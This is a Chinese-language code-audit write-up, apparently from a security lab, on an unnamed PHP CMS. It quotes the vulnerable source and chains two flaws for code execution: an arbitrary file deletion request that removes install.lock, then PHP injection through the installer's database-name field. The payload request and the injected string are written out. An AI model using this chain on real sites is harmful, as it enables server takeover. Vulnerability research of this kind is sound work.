0×00:前言
记录一次小型cms代码审计
0×01:任意文件删除
由于代码繁杂,不再一一展示
/app/controller/kindeditor.class.php
关键漏洞代码
public function delete() {
$path = ROOT_PATH.$_GET['pic'];
unlink($path);
$flash = M("flash");
$row = $flash->query("delete from tc_flash where
photo='".$_GET['pic']."'");
echo '删除成功';
}
}可以看到直接调用delete方法get传入pic参数就可以删除任意文件
0×02:Getshell
/install/index.php
case '4':
if (intval($_GET['install'])) {
$n = intval($_GET['n']);
$arr = array();
$dbHost = trim($_POST['dbhost']);
$dbPort = trim($_POST['dbport']);
$dbName = trim($_POST['dbname']);
$dbHost = empty($dbPort) || $dbPort == 3306 ? $dbHost : $dbHost .
':' . $dbPort;
$dbUser = trim($_POST['dbuser']);
$dbPwd = trim($_POST['dbpw']);
$dbPrefix = empty($_POST['dbprefix']) ? 'tc_' :
trim($_POST['dbprefix']);
$uname = trim($_POST['manager_email']);
$password = trim($_POST['manager_pwd']);
$webpath = trim($_POST['webpath']);
......
......
if ($i == 999999) exit;
$message = '成功添加站点信息<br />成功写入配置文件<br>安装完成.';
//
$newmodelstr = "<?php \n";
$newmodelstr .= " define('DBHOST', '" . $dbHost . "');\n ";
$newmodelstr .= "define('DBUSER', '" . $dbUser . "');\n ";
$newmodelstr .= "define('DBPWD', '" . $dbPwd . "');\n ";
$newmodelstr .= "define('DBNAME', '" . $dbName . "');\n ";
$newmodelstr .= "define('DBCODE', 'utf8');\n ";
$newmodelstr .= "define('DBCONN', " . $db_pconnect . ");\n ";
$newmodelstr .= "define('MORESITE', false);\n ";
$newmodelstr .= "define('USEMC', false);\n ";
$newmodelstr .= "define('MCHOST', '127.0.0.1');\n ";
$newmodelstr .= "define('MCPORT','11211');\n ";
$newmodelstr .= "define('MCHOST2', '127.0.0.1');\n ";
$newmodelstr .= "define('MCPORT2','11211');\n ";
$newmodelstr .= "\n?>\n";
$targetFile = '../app/data/mysql.php';
@file_put_contents($targetFile, $newmodelstr);
$arr = array('n' => 999999, 'msg' => $message);
die(json_encode($arr));
}
include_once ("./templates/s4.php");
exit;在安装cms的时候在$dbName可以写入一句话木马进行getshell
当然当你访问网站的时候已经是安装好了的
这时候需要上一个任意文件删除的漏洞删除/app/data/install.lock文件进行系统重装
0×03:如何调用
/***cms/core/controller.class.php
控制器代码
public function Run() {
$this->Analysis ();
$this->control = $_GET ['c'];
$this->action = $_GET ['a'];
if ($_GET ['a'] === "list") {
$this->action = "listAll";
}
$groupDir = GROUP_DIR;
$controlFile = ROOT_PATH . '/' . APP_PATH . "/" . GROUP_DIR . "/" .
$this->control . '.class.php';
if (! file_exists ( $controlFile )) {
$this->setValue ( "error", $this->control . Config::lang (
"CONTROLLERNOTEXISTS" ) );
$this->forward ( "error.html" );
exit ();
}
include ($controlFile);
if (! class_exists ( $this->control )) {
$this->setValue ( "error", $this->control . Config::lang (
"CONTROLLERNOTDEFINED" ) );
$this->forward ( "error.html" );
exit ();
}
if (! empty ( $_REQUEST ['token'] ) && ! in_array ( $_REQUEST ['ac'],
array ('user_login', 'user_reg', 'user_regOrLoginProtocol', 'user_findPwd',
'user_getCode' ) )) {
$this->pubCheck ();
}
$instance = new $this->control ();
$methodName = $this->action;
$instance->$methodName ();
$this->forceAttack()跟进$this->Analysis ();方法
protected function Analysis() {
$ac = array ();
$acStr = $_GET ['ac'];
if (empty ( $acStr )) { // 无ac参数
$ac [0] = $this->control;
$ac [1] = $this->action;
} else if (! strpos ( $acStr, '_' ) && $acStr) { // ac=list
$ac [0] = $acStr; // empty($this->control) ?
self::getDefaultAction() : $this->control;//NULL
$ac [1] = self::getDefaultAction ();
$modelClass = $ac [1];
$controlClass = $ac [0];
} else { // ac=news_list 支持下划线的控制器
$acAry = explode ( "_", $acStr );
if (count ( $acAry ) == 2) {
$modelClass = $acAry [1];
$controlClass = $acAry [0];
}
if (count ( $acAry ) == 3) {
$modelClass = $acAry [2];
$controlClass = $acAry [0] . '_' . $acAry [1];
}
}
if ($this->c ['URL_MODE'] == 1) {
$this->control = ! empty ( $controlClass ) ? trim ( $controlClass )
: $this->control;
$this->action = ! empty ( $modelClass ) ? trim ( $modelClass ) :
$this->action;
} else if ($this->c ['URL_MODE'] == 2) {
if (isset ( $_SERVER ['PATH_INFO'] )) {
$path = trim ( $_SERVER ['PATH_INFO'], '/' );
$paths = explode ( '/', $path );
// index.php/news/show/id/275
$this->control = array_shift ( $paths ); // news
$this->action = array_shift ( $paths ); // show
ParseUrl (); // news/show/id/275 index.php后面的
}
} else if ($this->c ['URL_MODE'] == 3) {
// $_SERVER["QUERY_STRING"]=>
// string(19) "ac=news_show&id=275"
// $_SERVER["REQUEST_URI"]=>
// string(30) "/index.php?ac=news_show&id=275"
// bencandy.php?fid-{$fid}-id-{$id}-page-{$page}.html
$path = str_replace ( ".asp", "", $_SERVER ["QUERY_STRING"] ); //
news-show-1
$paths = explode ( '-', $path );
$this->control = array_shift ( $paths ); // news
$this->action = array_shift ( $paths ); // show
$key = $this->action == 'show' ? 'id' : 'page';
$_GET [$key] = array_shift ( $paths ); // id page classidss
}
$_GET ['c'] = ! empty ( $this->control ) ? $this->control : 'index';
$_GET ['a'] = ! empty ( $this->action ) ? $this->action :
self::getDefaultAction ();
$ac [0] = $_GET ['c'];
$ac [1] = $_GET ['a'];http://url/index.php?ac=控制器_方法名进行访问
构造payload
ac=kindeditor_delete&pic=/app/data/install.lock
删除成功进到安装界面
数据库名字处输入');phpinfo();//
再次访问/***cms/index.php 成功输出
0×04:总结
代码审计抓住函数跟进就对了,知识点的综合利用很重要
继续审计去了,以上漏洞挺多的
关于摘星实验室:
摘星实验室是星云博创旗下专职负责技术研究的安全实验室,成立于2020年5月,团队核心成员均具备多年安全研究从业经验。实验室主要致力于攻防技术人员培养、攻防技术研究、安全领域前瞻性技术研究,为公司产品研发、安全项目及客户服务提供强有力的支撑。在技术研究方面,摘星实验室主攻漏洞挖掘及新型攻击,并将重点关注攻击溯源与黑客行为分析;与此同时,实验室还将持续关注对工业互联网领域的技术研究。
实验室成立以来,已通过CNVD/CNNVD累计发布安全漏洞300余个,是CNVD和CNNVD的漏洞挖掘支撑单位,在安全漏洞预警、事件通报处置等方面均得到了行业权威机构的认可。
本文暂时没有评论,来添加一个吧(●'◡'●)